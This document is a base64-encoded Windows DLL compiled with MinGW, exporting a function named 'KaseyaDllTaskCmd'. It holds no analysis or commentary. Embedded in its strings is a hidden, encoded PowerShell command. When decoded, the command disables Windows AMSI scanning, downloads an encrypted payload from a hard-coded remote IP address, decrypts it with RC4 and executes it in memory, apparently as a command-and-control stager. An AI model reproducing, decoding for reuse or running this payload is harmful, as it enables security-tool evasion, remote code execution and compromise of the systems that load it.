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J6QUdrQVNRQnVBR2tBZEFCR0FHRUFhUUJzQUdVQVpBQW5BQ3dBSndCT0FHOEFiZ0JRQUhVQVlnQnNBR2tBWXdBc0FGTUFkQUJoQUhRQWFRQmpBQ2NBS1FBdUFGTUFaUUJVQUZZQVFRQnNBSFVBWlFBb0FDUUFUZ0IxQUV3QVRBQXNBQ1FBVkFCU0FIVUFSUUFwQUgwQU93QmJBRk1BV1FCekFGUUFSUUJOQUM0QVRnQkZBSFFBTGdCVEFFVUFjZ0JXQUVrQVl3QkZBRkFBYndCcEFHNEFkQUJOQUdFQWJnQkJBR2NBWlFCU0FGMEFPZ0E2QUVVQVdBQlFBR1VBUXdCVUFERUFNQUF3QUVNQVR3Qk9BSFFBU1FCdUFGVUFSUUE5QURBQU93QWtBRmNBWXdBOUFFNEFSUUIzQUMwQVR3QmlBRW9BWlFCREFGUUFJQUJUQUZrQVV3QlVBRVVBYlFBdUFFNEFaUUJVQUM0QVZ3QkZBR0lBUXdCc0FHa0FaUUJ1QUZRQU93QWtBSFVBUFFBbkFFMEFid0I2QUdrQWJBQnNBR0VBTHdBMUFDNEFNQUFnQUNnQVZ3QnBBRzRBWkFCdkFIY0Fjd0FnQUU0QVZBQWdBRFlBTGdBeEFEc0FJQUJYQUU4QVZ3QTJBRFFBT3dBZ0FGUUFjZ0JwQUdRQVpRQnVBSFFBTHdBM0FDNEFNQUE3QUNBQWNnQjJBRG9BTVFBeEFDNEFNQUFwQUNBQWJBQnBBR3NBWlFBZ0FFY0FaUUJqQUdzQWJ3QW5BRHNBV3dCVEFIa0Fjd0IwQUdVQWJRQXVBRTRBWlFCMEFDNEFVd0JsQUhJQWRnQnBBR01BWlFCUUFHOEFhUUJ1QUhRQVRRQmhBRzRBWVFCbkFHVUFjZ0JkQURvQU9nQlRBR1VBY2dCMkFHVUFjZ0JEQUdVQWNnQjBBR2tBWmdCcEFHTUFZUUIwQUdVQVZnQmhBR3dBYVFCa0FHRUFkQUJwQUc4QWJnQkRBR0VBYkFCc0FHSUFZUUJqQUdzQUlBQTlBQ0FBZXdBa0FIUUFjZ0IxQUdVQWZRQTdBQ1FBVndCakFDNEFTQUJsQUdFQVJBQkZBRklBVXdBdUFFRUFaQUJFQUNnQUp3QlZBSE1BWlFCeUFDMEFRUUJuQUdVQWJnQjBBQ2NBTEFBa0FIVUFLUUE3QUNRQVZ3QkRBQzRBVUFCU0FHOEFlQUJaQUQwQVd3QlRBSGtBY3dCMEFHVUFiUUF1QUU0QVJRQjBBQzRBVndCbEFHSUFVZ0JsQUZFQVZRQmxBRk1BZEFCZEFEb0FPZ0JFQUVVQVpnQmhBRlVBVEFCVUFGY0FSUUJpQUZBQWNnQnZBSGdBV1FBN0FDUUFkd0JEQUM0QVVBQlNBRzhBV0FCNUFDNEFRd0J5QUVVQVJBQkZBRzRBVkFCcEFFRUFUQUJ6QUNBQVBRQWdBRnNBVXdCNUFITUFkQUJsQUUwQUxnQk9BR1VBZEFBdUFFTUFjZ0JGQUVRQVpRQnVBSFFBU1FCQkFFd0FRd0JCQUdNQWFBQmxBRjBBT2dBNkFFUUFaUUJtQUVFQVZRQk1BRlFBVGdCRkFGUUFkd0JQQUZJQVN3QkRBSElBUlFCRUFFVUFiZ0IwQUdrQVFRQk1BRk1BT3dBa0FFc0FQUUJiQUZNQWVRQlRBSFFBUlFCdEFDNEFWQUJGQUZnQVZBQXVBRVVBYmdCREFHOEFSQUJwQUU0QVp3QmRBRG9BT2dCQkFGTUFRd0JKQUVrQUxnQkhBR1VBZEFCQ0FGa0FWQUJsQUhNQUtBQW5BREFBTUFCbEFEVUFNUUJoQURjQVl3QmlBR0VBWXdCbUFEZ0FZUUEwQURBQU1RQmhBR1lBWkFCakFHUUFPUUExQURVQU1RQTBBR1lBWVFCa0FEa0FaUUFuQUNrQU93QWtBRklBUFFCN0FDUUFSQUFzQUNRQVN3QTlBQ1FBUVFCU0FFY0FVd0E3QUNRQVV3QTlBREFBTGdBdUFESUFOUUExQURzQU1BQXVBQzRBTWdBMUFEVUFmQUFsQUhzQUpBQktBRDBBS0FBa0FFb0FLd0FrQUZNQVd3QWtBRjhBWFFBckFDUUFTd0JiQUNRQVh3QWxBQ1FBU3dBdUFFTUFid0IxQUc0QVZBQmRBQ2tBSlFBeUFEVUFOZ0E3QUNRQVV3QmJBQ1FBWHdCZEFDd0FKQUJUQUZzQUpBQktBRjBBUFFBa0FGTUFXd0FrQUVvQVhRQXNBQ1FBVXdCYkFDUUFYd0JkQUgwQU93QWtBRVFBZkFBbEFIc0FKQUJKQUQwQUtBQWtBRWtBS3dBeEFDa0FKUUF5QURVQU5nQTdBQ1FBU0FBOUFDZ0FKQUJJQUNzQUpBQlRBRnNBSkFCSkFGMEFLUUFsQURJQU5RQTJBRHNBSkFCVEFGc0FKQUJKQUYwQUxBQWtBRk1BV3dBa0FFZ0FYUUE5QUNRQVV3QmJBQ1FBU0FCZEFDd0FKQUJUQUZzQUpBQkpBRjBBT3dBa0FGOEFMUUJDQUZnQWJ3QlNBQ1FBVXdCYkFDZ0FKQUJUQUZzQUpBQkpBRjBBS3dBa0FGTUFXd0FrQUVnQVhRQXBBQ1VBTWdBMUFEWUFYUUI5QUgwQU93QWtBSGNBUXdBdUFFZ0FSUUJCQUdRQVJRQnlBSE1BTGdCQkFHUUFaQUFvQUNJQVF3QnZBRzhBYXdCcEFHVUFJZ0FzQUNJQWN3QmxBSE1BY3dCcEFHOEFiZ0E5QUdjQWRBQkhBRTBBVkFCSUFFZ0FUd0JyQUNzQU53QmhBRlFBWXdCaEFHTUFkUUJvQUdNQVp3QkhBR2dBWndCSUFHc0FTQUJKQUQwQUlnQXBBRHNBSkFCekFHVUFjZ0E5QUNjQWFBQjBBSFFBY0FCekFEb0FMd0F2QURFQU1BQTBBQzRBTWdBekFEWUFMZ0F4QURrQU5nQXVBRFVBTmdBNkFEUUFOQUF6QUNjQU93QWtBSFFBUFFBbkFDOEFiQUJ2QUdjQWFRQnVBQzhBY0FCeUFHOEFZd0JsQUhNQWN3QXVBSEFBYUFCd0FDY0FPd0FrQUVRQVFRQlVBR0VBUFFBa0FGY0FRd0F1QUVRQWJ3QjNBRTRBVEFCUEFHRUFSQUJFQUVFQVZBQkJBQ2dBSkFCVEFHVUFVZ0FyQUNRQVZBQXBBRHNBSkFCSkFIWUFQUUFrQUdRQVFRQjBBRUVBV3dBd0FDNEFMZ0F6QUYwQU93QWtBR1FBUVFCVUFFRUFQUUFrQUdRQVFRQlVBR0VBV3dBMEFDNEFMZ0FrQUVRQVFRQjBBR0VBTGdCc0FFVUFiZ0JIQUZRQWFBQmRBRHNBTFFCS0FFOEFhUUJ1QUZzQVF3Qm9BR0VBY2dCYkFGMEFYUUFvQUNZQUlBQWtBRklBSUFBa0FHUUFZUUJVQUdFQUlBQW9BQ1FBU1FCV0FDc0FKQUJMQUNrQUtRQjhBRWtBUlFCWUFBPT0AAFNcYiBQXGKQGFxiTWluZ3ctdzY0IHJ1bnRpbWUgZmFpbHVyZToKAEFkZHJlc3MgJXAgaGFzIG5vIGltYWdlLXNlY3Rpb24AICBWaXJ0dWFsUXVlcn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IAAFZyAABmcgAAgnIAAJpyAAC0cgAA0nIAANpyAADucgAA/HIAABhzAAAqcwAAOnMAAAAAAABQcwAAXnMAAGxzAAB4cwAAgHMAAIhzAACScwAAmnMAAKRzAACucwAAuHMAAMBzAADKcwAA1HMAAN5zAADmcwAA8nMAAAAAAACoAENyZWF0ZVByb2Nlc3NBAADVAERlbGV0ZUNyaXRpY2FsU2VjdGlvbgDxAEVudGVyQ3JpdGljYWxTZWN0aW9uAADGAUdldEN1cnJlbnRQcm9jZXNzAMcBR2V0Q3VycmVudFByb2Nlc3NJZADLAUdldEN1cnJlbnRUaHJlYWRJZAAABQJHZXRMYXN0RXJyb3IAABcCR2V0TW9kdWxlSGFuZGxlQQAARwJHZXRQcm9jQWRkcmVzcwAAfQJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQCZAkdldFRpY2tDb3VudAAA7QJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uACgDTGVhdmVDcml0aWNhbFNlY3Rpb24AAJgDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAbQRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAegRTbGVlcACIBFRlcm1pbmF0ZVByb2Nlc3MAAI8EVGxzR2V0VmFsdWUAnARVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAALwEVmlydHVhbFByb3RlY3QAAL8EVmlydHVhbFF1ZXJ5AADIBFdhaXRGb3JTaW5nbGVPYmplY3QAMABfX2RsbG9uZXhpdAB9AF9hbXNnX2V4aXQAABgBX2luaXR0ZXJtABwBX2lvYgAAfQFfbG9jawAaAl9vbmV4aXQAwgNmcmVlAADLA2Z3cml0ZQAA9wNtYWxsb2MAAP8DbWVtc2V0AAAIBHB1dHMAACUEc3RybGVuAAAnBHN0cm5jbXAApwJfdW5sb2NrAPoCYWJvcnQAcgR2ZnByaW50ZgAAowNjYWxsb2MAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAABLRVJORUwzMi5kbGwAAAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAABtc3ZjcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQXGIAAAAAAAAAAJAYXGJAGFxiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQXGIckFxibFNcYhiAXGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAXAEAAB0wIjBPMGIwZzCHMJAw1zD6MAUxEzEgMTYxXDGBMZQxwjHMMdgx4jECMhQyGzIhMkgyTzJaMoEyiDLnMgU0RzRSNFg0bDR1NIU0jjS8NEQ1UDVoNYU1qzW8Nfc1DzYpNmE2czZ/NpY2pjayNsw24TbyNgg3Jjc7N0w3VDdcN2s3jjeUN7g3yDfZN9434zfrN/A3+DcBOAs4ETgaOCs4lzikOMQ4yThFOWA5fTmoObY59DklOjI6Vzp0OoE6ljqdOqs6vTrROus6AjsmOzg7PTtCO1U7YjtrO3A7fTuSO6o7sDu5O9876TvvOwo8EDwd